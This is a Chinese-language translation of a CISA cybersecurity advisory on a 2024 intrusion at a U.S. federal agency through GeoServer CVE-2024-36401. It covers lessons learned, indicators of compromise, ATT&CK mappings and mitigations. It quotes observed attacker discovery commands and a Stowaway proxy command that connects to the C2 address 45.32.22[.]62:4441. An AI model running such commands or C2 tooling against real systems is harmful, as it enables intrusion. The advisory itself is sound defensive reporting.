执行摘要
网络安全和基础设施安全局 (CISA) 在接到美国联邦文职行政部门 (FCEB) 一家机构因其端点检测和响应 (EDR) 工具生成的安全警报而报告的潜在恶意活动后,启动了事件响应。CISA 从此次响应行动中总结出三项关键教训,揭示了如何有效降低风险、为事件做准备以及进行响应:漏洞未及时修复、该机构未测试或演练其事件响应计划 (IRP),以及未持续审查 EDR 警报。
关键行动
- 预防入侵:优先修补面向公众系统的关键漏洞和已知被利用漏洞。
- 为事件做好准备:维护、演练和更新事件响应计划。
- 为事件做好准备:实施全面且详细的日志记录,并将日志聚合到集中式带外位置。
入侵指标
有关可下载的入侵指标副本,请参阅:
- AA25-266A-JSON.stix_.json
- AA25-266A-STIX.stix_.xml
目标受众
- 组织:FCEB 机构和关键基础设施组织。
- 角色:防御性网络安全分析师、漏洞分析师、安全系统管理员、系统安全分析师以及网络安全政策与规划专业人员。
引言
网络安全和基础设施安全局 (CISA) 发布此网络安全公告,旨在强调 CISA 在美国联邦文职行政部门 (FCEB) 一家机构执行事件响应任务后获得的经验教训。CISA 发布此公告是为了强调及时修补漏洞的重要性,以及通过演练事件响应计划、实施日志记录并将日志聚合到集中式带外位置来为事件做好准备的重要性。CISA 同时也在提高对此次网络威胁行为者所用战术、技术与程序 (TTP) 的认识,以帮助各组织防范类似的利用行为。
CISA 在一家 FCEB 机构通过其端点检测和响应 (EDR) 工具生成的安全警报识别出潜在恶意活动后,启动了事件响应工作。CISA 发现,网络威胁行为者在该 EDR 警报发出前约三周,通过利用 GeoServer 中的 CVE-2024-36401 漏洞入侵了该机构。在这三周内,网络威胁行为者通过同一漏洞获得了对第二个 GeoServer 的初始访问权限,并横向移动至另外两台服务器。
利用从该组织安全态势和响应中收集到的信息,CISA 分享了以下经验教训,以帮助各组织防范类似的入侵(详见"经验教训"部分):
- 漏洞未及时修复。
- 网络威胁行为者利用 CVE-2024-36401 在两个 GeoServer 上获得初始访问权限。
- 该漏洞在威胁行为者访问第一个 GeoServer 前 11 天、访问第二个 GeoServer 前 25 天被披露。
- 该机构未测试或演练其事件响应计划 (IRP),且其 IRP 未使其能够及时与第三方接洽并授予第三方访问必要资源的权限。
- 这延迟了 CISA 响应的某些环节,因为该 IRP 没有涉及第三方协助或授予第三方访问其安全工具的程序。
- 未持续审查 EDR 警报,且部分面向公众的系统缺乏端点保护。
- 该活动在环境中潜伏了三周未被发现;该机构错过了更早发现此活动的机会,因为他们没有观察到来自 GeoServer 的警报,并且 Web 服务器缺乏端点保护。
这些经验教训突显了有效降低风险、增强准备情况以及更高效响应事件的策略。CISA 鼓励所有组织考虑这些经验教训,并应用本公告"缓解措施"部分中的相关建议,以改善其安全态势。
本公告还提供了网络威胁行为者的 TTP 和入侵指标 (IOC)。有关可下载的 IOC 副本,请参阅:
- AA25-266A-JSON.stix_.json
- AA25-266A-STIX.stix_.xml
技术细节
注意:本公告使用了 MITRE ATT&CK® Enterprise 框架,版本 17。有关威胁行为者活动与 MITRE ATT&CK 战术和技术映射的表格,请参阅本公告的"MITRE ATT&CK 战术和技术"部分。
威胁行为者活动
CISA 在接到一家大型 FCEB 机构的安全运营中心 (SOC) 观察到多个端点安全警报后,响应对该机构疑似入侵的事件。
在事件响应过程中,CISA 发现网络威胁行为者于 2024 年7月11日通过利用面向公众的 GeoServer (GeoServer 1) 上的 GeoServer 漏洞 CVE-2024-36401 [CWE-95: “Eval Injection”] 获得了对该机构网络的访问权限。此于 2024 年6月30日披露的关键漏洞允许未经身份验证的用户在受影响的 GeoServer 版本上获得远程代码执行 (RCE) 能力 [1]。网络威胁行为者利用此漏洞下载开源工具和脚本,并在该机构网络中建立持久性。(CISA 已于 2024年7月15日将此漏洞添加到其已知被利用漏洞 (KEV) 目录中。)
在获得对 GeoServer 1 的初始访问权限后,网络威胁行为者于 2024年7月24日通过利用同一漏洞,获得了对第二个 GeoServer (GeoServer 2) 的独立初始访问权限。他们从 GeoServer 1 横向移动到一台 Web 服务器 (Web Server),然后是一台结构化查询语言 (SQL) 服务器。在每台服务器上,他们上传(或试图上传)诸如中国菜刀之类的 Web Shell,以及为远程访问、持久化、命令执行和权限提升而设计的脚本。网络威胁行为者还使用了"就地取材" (LOTL) 技术。
有关网络威胁行为者活动的概览,请参见图 1。详细威胁行为者 TTP 请参阅后续章节。
图 1. 威胁行为者活动概览 (图略)
侦察
网络威胁行为者使用 Burp Suite Burp Scanner [T1595.002] 识别了该组织面向公众的 GeoServer 中的 CVE-2024-36401。CISA 通过分析 Web 日志并识别与该工具相关的特征,检测到了此扫描活动。具体来说,CISA 观察到与 Burp Collaborator(Burp Suite 用于漏洞检测的组件)相关联的域名,其源 IP 地址与威胁行为者后来用于利用 GeoServer 漏洞获取初始访问权限的 IP 地址相同。
资源开发
网络威胁行为者使用公开可用的工具进行恶意操作。在其中一次实例中,他们获得了对该机构网络的远程访问,并利用了来自云基础设施提供商的商用虚拟专用服务器 (VPS) [T1583.003]。
初始访问
为了获得对 GeoServer 1 和 GeoServer 2 的初始访问权限,网络威胁行为者利用了 CVE-2024-36401 [T1190]。他们利用此漏洞,通过执行"eval 注入"(一种代码注入,允许不受信任的用户输入被当作代码执行)来获得 RCE。威胁行为者可能试图加载 JavaScript 扩展来获取 GeoServer 1 上作为 Apache wicket 的 Web 服务器信息。然而,他们的努力可能没有成功,因为 CISA 在 Web 日志中观察到尝试访问 .js 文件返回了 404 响应,表明服务器无法找到请求的 URL。
持久化
网络威胁行为者主要在面向互联网的主机上使用 Web Shell [T1505.003],结合 cron 作业(在指定时间自动运行的预定命令)[T1053.003] 和有效账户 [T1078] 来实现持久化。CISA 还发现了账户的创建(尽管这些账户后来被删除),但没有证据表明这些账户被进一步使用。
权限提升
网络威胁行为者尝试使用公开可用的 dirtycow 工具 [2] 来提升权限,该工具可用于利用 CVE-2016-5195 [CWE-362: “竞争条件”] [T1068]。在入侵 Web 服务账户后,他们提升了本地权限以摆脱这些服务账户(尚不清楚他们是如何提升权限的)。
注意:CVE-2016-5195 影响 Linux kernel 2.x 至 4.x(4.8.3 之前版本),并允许用户提升权限。CISA 已于 2022年3月3日将此 CVE 添加到其 KEV 目录中。
防御规避
为了逃避检测,网络威胁行为者通过 .php Web Shell 和 xp_cmdshell [T1202] 采用间接命令执行,并滥用了后台智能传输服务 (BITS) 作业 [T1197]。CISA 还在 GeoServer 1 上观察到名为 RinqQ.exe 和 RingQ.rar 的文件,这些文件很可能指向一个名为 RingQ [3] 的公开防御规避工具,威胁行为者已将其暂存以备可能使用。
注意:CISA 无法恢复主机上的大部分文件以确认其内容。
凭据访问
一旦进入该机构的网络,网络威胁行为者主要依赖暴力破解技术 [T1110] 来获取用于横向移动和权限提升的密码。他们还通过利用相关服务来访问服务账户。
发现
在获得初始访问权限后,网络威胁行为者进行了发现活动以促进横向移动。他们对特定子网内的主机执行了 ping 扫描 [T1018],并下载了 fscan 工具 [4] 来扫描该机构的网络。CISA 通过分析在磁盘上发现的其输出证据,识别出了 fscan 工具的使用。(注意:fscan 在 GitHub 上公开可用,能够进行端口扫描、指纹识别和 Web 漏洞检测等功能。)在 2024 年 7 月 15 日至 31 日期间,网络威胁行为者使用 fscan 和 linux-exploit-suggester2.pl 进行了广泛的网络和漏洞扫描。CISA 的主机取证分析师通过审查威胁行为者在磁盘上留下的残留痕迹发现了此活动。
GeoServer 1 网络威胁行为者利用 CVE-2024-36401 在 GeoServer 1 上执行了以下主机发现命令:
uname -adf -henvps -auxipconfig[T1016]datewho -brpm -qa polkitnetstat -ano[T1049]
此外,他们在 GeoServer 1 上采用了 LOTL 技术进行用户、服务、文件系统和网络发现:
cat /etc/passwd[T1087.001]cat /etc/resolv.confcat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xmlcat /etc/redhat-release[T1082]cat /etc/os-release
随后,网络威胁行为者使用 curl 命令将一个名为 mm.sh 的 shell 脚本(他们将其重命名为 aa.sh)和一个名为 aaa.zip 的 zip 文件下载到 /tmp/ 目录。
接着,他们从 GeoServer 1 枚举内部网络,通过使用 fscan 工具识别了安全外壳 (SSH) 监听器、文件传输协议 (FTP) 服务器、文件服务器和 Web 服务器 [T1046]。(注意:CISA 观察到端点日志显示威胁行为者将 fscan 上传到被入侵的主机,并针对内部系统运行它。)然后,攻击者试图对被利用的 Web 服务进行暴力破解登录凭据,以获得远程访问权限、实现 RCE 或进行横向移动。
网络威胁行为者还使用 fscan 对该机构内部多个子网内的若干主机进行了 ping 扫描。他们对 fscan 使用 -nobr 和 -nopoc 标志表明此扫描分别排除了暴力破解或漏洞扫描。
SQL 服务器 CISA 在该机构的 SQL 服务器上观察到以下发现命令:
whoami[T1033]ipconfig /allping -n 1 8.8.8.8systeminfotasklist[T1057]dir c:\[T1083]dir c:\Userstype c:\Last.txttype c:\inetpub\wwwroottype c:\inetpub\dir c:\inetpub\wwwrootdir c:\dir c:\ifwappsdir d:\dir e:\net group "domain admins" /domaintype C:\Windows\System32\inetsrv\config\applicationHost.configdir c:\ifwapps\Tier1Utilitiesnetstat -anocurlnet usertasklist
GeoServer 2 根据 CISA 收到的 GeoServer 2 镜像,CISA 观察到一个用户的 bash 历史记录,显示了使用 Burp Collaborator 来执行编码的主机和网络发现命令。
横向移动
在一个实例中,网络威胁行为者通过在 GeoServer 1 上启用 xp_cmdshell 以实现 RCE,从而从 Web 服务器横向移动到 SQL 服务器。
命令与控制
网络威胁行为者使用 PowerShell [T1059.001] 和 bitsadmin getfile 来下载有效负载 [T1105]。
他们使用 Stowaway [5](一种公开可用的多级代理工具)来建立 C2 [T1090]。Stowaway 使网络威胁行为者能够绕过该机构的内网限制,通过将其 C2 服务器的流量转发到 Web 服务器来访问内部网络资源。他们使用一个 tomcat 服务账户将 Stowaway 写入磁盘。
然后,攻击者通过 /var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10 执行了 Stowaway。
为了测试他们的访问级别,网络威胁行为者对该机构网络中特定子网的多个主机进行了 ping 扫描。接下来,威胁行为者使用 curl 命令下载了 Stowaway 的修改版本,并使用 HTTP over TCP/4441 成功建立了与其 C2 服务器的出站连接。
2024 年 7 月 14 日,网络威胁行为者在 Web 服务器上执行了 /tmp/mm.sh,随后是一条执行 Stowaway 的编码命令。该文件的内容无法恢复。此外,他们还使用 Stowaway 通过 TCP/50012 建立了第二个 C2 连接,很可能作为备用 C2 通道。
CISA 发现了托管在 C2 服务器上的各种文件的证据,包括许多公开可用的工具和脚本:
- RingQ 防病毒防御规避工具 (RingQ.exe, RingQ.rar)
- IOX 代理工具 (iox.rar)
- BusyBox 木马多功能工具 (busybox)
- WinRAR 归档工具 (Rar.exe)
- Stowaway 代理工具 (agent, agent.tar, agent.zip, agentu.exe)
- Web Shell (Handx.ashx, start_tomcat.jsp)
- 各种 Shell 脚本 (mm.sh, t.py, t1.sh, c.bat)
检测
网络威胁行为者在该机构的环境中潜伏了三周未被发现,之后该机构的 SOC 利用其 EDR 工具识别出此次入侵。2024 年 7 月 31 日,其 EDR 工具在 SQL 服务器上识别出作为疑似恶意软件上传的 1.txt 文件。当网络威胁行为者在尝试其他 LOTL 技术(如利用 PowerShell 和 certutil)后通过 bitsadmin 将 1.txt 传输到 SQL 服务器时,SOC 对额外的警报做出了响应。SQL 服务器上此活动生成的警报促使 SOC 隔离了该服务器,启动了调查,向 CISA 请求了援助,并发现了 GeoServer 1 上的恶意活动。
经验教训
CISA 根据通过事件检测和响应活动了解到的该机构安全态势,分享以下经验教训。
-
漏洞未及时修复。
- 网络威胁行为者利用 CVE-2024-36401 在两个 GeoServer 上获得初始访问权限。
- 该漏洞于 2024年6月30日披露,网络威胁行为者于 2024年7月11日利用它获得了对 GeoServer 1 的初始访问权限。
- 该漏洞于 2024年7月15日被添加到 CISA 的 KEV 目录中,而到 2024年7月24日威胁行为者利用它访问 GeoServer 2 时,该漏洞仍未修补。
注意:根据《约束性操作指令》(BOD) 22-01,FCEB 机构必须在规定时间内修复 CISA KEV 目录中的漏洞。2024年7月24日仍在此 CVE 的 KEV 要求的修补窗口期内。然而,CISA 鼓励 FCEB 机构和关键基础设施组织立即处理 KEV 目录漏洞,作为其漏洞管理计划的一部分。
-
该机构未测试或演练其 IRP,且其 IRP 未使其能够及时与第三方接洽并授予第三方访问必要资源的权限。
- 2024年8月1日,在发现端点警报后,该机构对受影响系统进行了远程分类,并使用其 EDR 工具遏制了入侵。
- 遏制后,该机构请求 CISA 调查其环境中潜在的威胁行为者持久性。
- 其 IRP 没有引入第三方援助的程序,这阻碍了 CISA 快速高效响应事件的努力。
- 该机构无法向 CISA 提供对其安全信息和事件管理 (SIEM) 工具的远程访问权限,这最初使 CISA 无法审查所有可用日志,阻碍了 CISA 的分析。
- 该机构必须经过其变更控制委员会流程,CISA 才能部署其 EDR 代理。
- 该机构本可以通过测试其 IRP(例如通过桌面演练)来主动识别这些障碍,但已有很长时间未测试其计划。
-
未持续审查 EDR 警报,且部分面向公众的系统缺乏端点保护。
- 该活动在环境中潜伏了三周未被发现;该机构错过了在 2024年7月15日检测此活动的机会,因为他们没有观察到来自 GeoServer 1 的警报,而该处 EDR 检测到了 Stowaway 工具。
- Web 服务器缺乏端点保护。
入侵指标
有关与此活动相关的 IOC,请参见表 1。
免责声明:本公告中观察到的 IP 地址时间为 2024 年 8 月,其中一些可能与合法活动相关联。鼓励各组织在采取行动(例如封禁)之前调查这些 IP 地址周围的活动。在没有分析证据支持这些 IP 地址受威胁行为者指示或控制的情况下,不应将其活动归因于恶意。
表 1. 入侵指标 (IOC)
| IOC | 类型 | 日期 | 描述 |
|---|---|---|---|
| 45.32.22[.]62 | IPv4 | 2024年7月中旬至8月初 | C2 服务器 IP 地址 |
| 45.17.43[.]250 | IPv4 | 2024年7月中旬至8月初 | C2 服务器 IP 地址 |
| 0777EA1D01DAD6DC261A6B602205E2C8 | MD5 | 2024年7月中旬至8月初 | 中国菜刀 Web Shell |
| feda15d3509b210cb05eacc22485a78c | MD5 | 2024年7月中旬至8月初 | 通用 PHP Web Shell |
| C9F4C41C195B25675BFA860EB9B45945 | MD5 | 2024年7月中旬至8月初 | Linux 漏洞利用 CVE-2016-5195 |
| B7B3647E06F23B9E83D0B1CCE3E71642 | MD5 | 2024年7月中旬至8月初 | Dirtycow |
| 64e3a3458b3286caaac821c343d4b208 | MD5 | 2024年7月中旬至8月初 | Stowaway 代理工具 |
| 20b70dac937377b6d0699a44721acd80 | MD5 | 2024年7月中旬至8月初 | 未知下载的可执行文件 |
| de778443619f37e2224898a9a800fa78 | MD5 | 2024年7月中旬至8月初 | 未知下载的可执行文件 |
MITRE ATT&CK 战术和技术
所有引用的威胁行为者战术和技术请参见表 2 至表 11。
表 2. 侦察
| 技术标题 | ID | 用途 |
|---|---|---|
| 主动扫描:漏洞扫描 | T1595.002 | 网络威胁行为者执行主动扫描,以识别可用于初始访问的漏洞。 |
表 3. 资源开发
| 技术标题 | ID | 用途 |
|---|---|---|
| 获取基础设施:虚拟专用服务器 | T1583.003 | 网络威胁行为者使用位于虚拟专用服务器 (VPS) 后端的桌面来获得对受害者网络的远程访问。 |
表 4. 初始访问
| 技术标题 | ID | 用途 |
|---|---|---|
| 利用面向公众的应用程序 | T1190 | 网络威胁行为者利用该组织两个面向公众的 GeoServer 上的 CVE-2024-36401。 |
表 5. 执行
| 技术标题 | ID | 用途 |
|---|---|---|
| 命令和脚本解释器:PowerShell | T1059.001 | 网络威胁行为者使用 PowerShell 下载有效负载。 |
表 6. 防御规避
| 技术标题 | ID | 用途 |
|---|---|---|
| 间接命令执行 | T1202 | 网络威胁行为者通过 Web Shell 采用间接命令执行。 |
表 7. 持久化
| 技术标题 | ID | 用途 |
|---|---|---|
| BITS 作业 | T1197 | 网络威胁行为者滥用 BITS 作业。 |
| 计划任务/作业:Cron | T1053.003 | 网络威胁行为者通过 cron 作业建立持久化。 |
| 服务器软件组件:Web Shell | T1505.003 | 网络威胁行为者上传 Web Shell 以实现持久化。 |
| 有效账户 | T1078 | 网络威胁行为者使用有效账户实现持久化。 |
表 8. 权限提升
| 技术标题 | ID | 用途 |
|---|---|---|
| 利用漏洞进行权限提升 | T1068 | 网络威胁行为者试图利用 CVE-2016-5195 来提升权限。 |
表 9. 凭据访问
| 技术标题 | ID | 用途 |
|---|---|---|
| 暴力破解 | T1110 | 网络威胁行为者使用暴力破解技术来获取 Web 服务的登录凭据。 |
表 10. 发现
| 技术标题 | ID | 用途 |
|---|---|---|
| 账户发现:本地账户 | T1087.001 | 网络威胁行为者使用 cat /etc/passwd 来发现本地用户。 |
| 文件和目录发现 | T1083 | 网络威胁行为者使用 dir c:\, dir d:\, dir e:\ 和 type c:\ 命令来识别 SQL 服务器上的文件和目录。 |
| 网络服务发现 | T1046 | 网络威胁行为者使用 fscan 来识别 SSH 监听器和 FTP 服务器。 |
| 进程发现 | T1057 | 网络威胁行为者在 SQL 服务器上使用 tasklist。 |
| 远程系统发现 | T1018 | 网络威胁行为者对特定子网内的主机执行 ping 扫描。 |
| 系统信息发现 | T1082 | 网络威胁行为者使用 cat /etc/redhat-release 和 cat /etc/os-release 命令来获取 Red Hat Enterprise Linux (RHEL) 和 Linux 操作系统信息。 |
| 系统网络配置发现 | T1016 | 网络威胁行为者使用 ipconfig 检查 GeoServer 1 和 SQL 服务器的网络配置。 |
| 系统网络连接发现 | T1049 | 网络威胁行为者执行诸如 netstat 等命令,以获取与他们入侵的系统之间网络连接的列表。 |
| 系统所有者/用户发现 | T1033 | 网络威胁行为者在 SQL 服务器上使用 whoami。 |
表 11. 命令与控制
| 技术标题 | ID | 用途 |
|---|---|---|
| 入口工具传输 | T1105 | 网络威胁行为者使用 PowerShell 和 bitsadmin getfile 来下载有效负载。 |
| 代理 | T1090 | 网络威胁行为者使用连接代理来引导来自其 C2 服务器的流量。 |
缓解措施
CISA 建议各组织根据从此次任务中获得的经验教训,实施以下缓解措施以改善网络安全态势。这些缓解措施与 CISA 和美国国家标准与技术研究院 (NIST) 制定的跨部门网络安全性能目标 (CPG) 保持一致。CPG 提供了 CISA 和 NIST 建议所有组织实施的一套最低实践和保护措施。CISA 和 NIST 基于现有的网络安全框架和指南制定了 CPG,以防范最常见和影响最大的威胁、战术、技术和程序。访问 CISA 的跨部门网络安全性能目标以获取有关 CPG 的更多信息,包括其他推荐的基线保护措施。
-
建立漏洞管理计划,其中包含优先级排序和紧急修补程序。
- 优先修补 KEV 目录中已知被利用的漏洞。
- CISA 敦促各组织立即处理 KEV 目录中的漏洞。
- 优先修补高风险系统中的漏洞,包括面向公众的系统,因为它们是威胁行为者有吸引力的目标。
- 通过实施资产管理实践和进行资产清查,确保高风险系统被识别并优先进行快速修补。
- 通过自动化资产管理和扫描(例如,攻击面管理工具、漏洞扫描器)持续发现和验证面向互联网的资产。
- 考虑使用配置管理数据库 (CMDB) 配合发现和漏洞工具,以丰富资产上下文并支持自动化优先级排序。
- 组建一个专门团队,负责评估和实施紧急补丁,该团队应包括 IT、安全和相关业务部门的代表。
- 优先修补 KEV 目录中已知被利用的漏洞。
-
维护、演练和更新网络安全事件响应计划 (IRP) [CPG 2.S, 5.A]。
- 在高级领导层的支持下,准备书面的 IRP 政策和 IRP。
- 政策应明确目的和目标、事件构成、事件的优先级或严重性评级、明确的升级程序、IR 人员以及与媒体、执法部门和合作伙伴进行通知、互动和信息共享的计划。
- IRP 应明确:
- 熟悉网络的关键人员。
- 在发生入侵时用于遏制和根除的关键资源和行动方案 (COA)。
- 授予第三方及时访问网络和安全工具的程序。
- 这应包括通过变更控制委员会 (CCB) 加速部署 EDR 和其他安全工具的流程。
- IRP 应包括建立带外通信系统和账户的程序,以防主系统被入侵或不可用(例如发生勒索软件事件时)。
- 在真实条件下定期测试 IRP,例如通过紫队参与和桌面演练。
- 测试期间,应包括与第三方事件响应者以及外部 EDR 代理和其他工具的互动。
- 测试后,根据需要更新 IRP。
- 有关资源,请参阅 CISA 的桌面演练套件,旨在帮助各组织开展自己的演练。
- 有关 IRP 的更多信息,请参阅美国国家标准与技术研究院 (NIST) 的 SP 800-61 Rev. 3,《事件响应建议和网络安全风险管理注意事项:CSF 2.0 社区概况》。
- 在高级领导层的支持下,准备书面的 IRP 政策和 IRP。
-
实施全面(即覆盖范围广)且详细(即内容详细)的日志记录,并将日志聚合到带外、集中的位置。
- 为 SOC 配备足够的资源,以监控收集到的日志并响应恶意网络威胁活动。
- 考虑使用 SIEM 解决方案进行日志聚合和管理。
- 识别、警报并调查异常网络活动(因为威胁行为者活动会在攻击链的所有阶段产生异常网络流量)。
- 需要注意的异常活动包括:
- 运行扫描以发现其他网络连接设备。
- 运行命令来列出、添加或更改管理员账户。
- 使用 PowerShell 下载和执行远程程序。
- 运行通常在网络上未见的脚本。
- 更多信息,请参阅联合指南《识别和缓解就地取材技术》,该指南提供了优先检测建议,支持行为分析、异常检测和主动狩猎。
- 需要注意的异常活动包括:
此外,CISA 建议各组织根据威胁行为者的活动实施以下缓解措施:
- 要求对所有特权账户和电子邮件服务账户使用抗钓鱼多因素认证 (MFA) [CPG 2.H]。
- 对应用程序、脚本和网络流量实施允许列表,以防止未经授权的执行和访问。
验证安全控制措施
除了应用缓解措施外,CISA 还建议根据本公告中映射到 MITRE ATT&CK Enterprise 框架的威胁行为,来演练、测试和验证您组织的安全计划。CISA 建议测试您现有的安全控制清单,以评估它们针对本公告中描述的 ATT&CK 技术的表现。
开始步骤:
- 选择本公告中描述的一种 ATT&CK 技术(参见表 3 至表 11)。
- 将您的安全技术与该技术对齐。
- 针对该技术测试您的技术。
- 分析您的检测和预防技术的性能。
- 对所有安全技术重复此过程,以获得一套全面的性能数据。
- 根据此过程产生的数据,调整您的安全计划,包括人员、流程和技术。
CISA 建议持续在生产环境中大规模测试您的安全计划,以确保针对本公告中识别的 MITRE ATT&CK 技术达到最佳性能。
资源
- 《事件响应计划 (IRP) 基础》
- 《识别和缓解就地取材技术》
- 《抗钓鱼多因素认证 (MFA) 成功案例:美国农业部的 FIDO 实施》
免责声明
本报告中的信息仅“按原样”提供,仅供参考。CISA 不认可任何商业实体、产品、公司或服务,包括本文件内链接的任何实体、产品或服务。提及任何特定的商业实体、产品、流程或服务(通过服务标记、商标、制造商或其他方式),并不构成或暗示 CISA 的认可、推荐或偏爱。
版本历史
- 2025年9月23日:初始版本。
附录:关键事件时间线
| 日期/时间 | 相关主机 | 事件 |
|---|---|---|
| 2024年7月1日 | 无 | CVE-2024-36401 发布。 |
| 2024年7月11日 | GeoServer 1 | 对 GeoServer 1 的初始访问。 |
| 2024年7月15日 | 无 | CVE-2024-36401 添加到 CISA 的已知被利用漏洞目录。 |
| 2024年7月15日 | GeoServer 1 | EDR 在 GeoServer 1 上检测到 Stowaway 工具。 |
| 2024年7月24日 | GeoServer 2 | 对 GeoServer 2 的初始访问。 |
| 2024年7月31日 | Web Server | 对 Web Server 的初始访问。 |
| 2024年7月31日 | SQL Server | 对 SQL Server 的初始访问。 |
| 2024年8月1日 | SQL Server, GeoServer 1 | 该机构观察到 SQL 警报并隔离了 SQL Server 和 GeoServer 1。 |
| 2024年8月1日 | 无 | 受影响组织向 CISA 请求援助。 |
| 2024年8月5日 | 无 | CISA 开始取证分析。 |
| 2024年8月6日 | GeoServer 2 | 最后观察到的威胁行为者活动——GeoServer 2 上的发现命令。 |
| 2024年8月8日至9月3日 | 无 | CISA 进行全面的事件响应。 |
注释
[1] “GeoServer/GeoServer,” GitHub, 发布于 2024年7月1日,https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w [2] “firefart/dirtycow,” GitHub, 最后修改于 2021年, https://github.com/firefart/dirtycow [3] “T4y1oR/RingQ” GitHub, 最后修改于 2025年2月19日。 https://github.com/T4y1oR/RingQ [4] “shadow1ng/fscan,” GitHub, 最后修改于 2025年7月, https://github.com/shadow1ng/fscan [5] “ph4ntonn/Stowaway,” GitHub, 最后修改于 2025年4月, https://github.com/ph4ntonn/Stowaway